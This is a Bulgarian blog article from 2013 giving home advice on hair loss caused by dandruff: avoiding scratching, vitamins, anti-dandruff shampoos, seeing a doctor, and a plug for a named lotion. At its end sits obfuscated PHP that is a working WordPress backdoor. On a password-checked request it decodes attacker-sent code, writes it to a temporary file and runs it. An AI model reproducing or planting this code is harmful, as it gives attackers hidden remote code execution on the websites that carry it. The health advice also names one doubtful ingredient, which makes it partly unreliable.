Как да се справим с косопада, причинен от пърхот | Косопад

Как да се справим с косопада, причинен от пърхот

Опитите да контролирате срамните люспи пърхот е достатъчна причина за всяка жена да иска да си изскубе цялата коса. Когато косата започне да си пада сама, повечето жени изпадат в паника. Въпреки че много хора смятат, че сърбежите по скалпа и малкото публично унижение, са единствените странични ефекти от пърхота, това заболяване може да причини косопад.

пърхот3

За щастие, пърхотът лесно се третира и ако го направите, ще спрете и косопада, който причинява. Затова, ето какво трябва да направите, за да се справите с проблема.

Ще ви трябват

1. Шампоан срещу пърхот
2. Балсам срещу пърхот
3. Витамини

Инструкции:

1. Не се поддавайте на желанието да се почешете. Винаги, когато нещо по тялото ви сърби, е желателно да не се чешете. И при пърхота е така. Чесането по скалпа маха естествената кутикула, която го защитава, като го прави по- податлив на наранявания.

2. Взимайте витамини. Пърхотът може да се дължи на факта, че в храненето си не приемате достатъчно витамини В6, пърхот4В12, F, бета каротен и селен.

3. Пробвайте шампоаните и балсамите срещу пърхот. Продуктите, които съдържат селен, цинк пиритион и алкеран се ефективни срещу пърхота. Търсете продукти, които съдържат тези съставки и вижте кой е най- подходящият. Следвайте инструкциите на продукта.

4. Когато приятелите ви разберат, че използвате шампоан против пърхот, ще започнат да ви убеждават, че е пълен с вредни химикали. Истината е, че днешните шампоани са достатъчно деликатни и няма как да наранят скалпа ви. Затова не се поддавайте на популярния мит, че химикалите в шампоаните срещу пърхот, причиняват косопад.

5. Посетете лекаря си. Понякога е необходимо по- силно лечение срещу пърхота и косопада.

6. Може да си поръчате и лосионът „Ефект- 2“, който също ще ви помогне срещу пърхота и косопада.

18. декември 2013 14:53:30 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}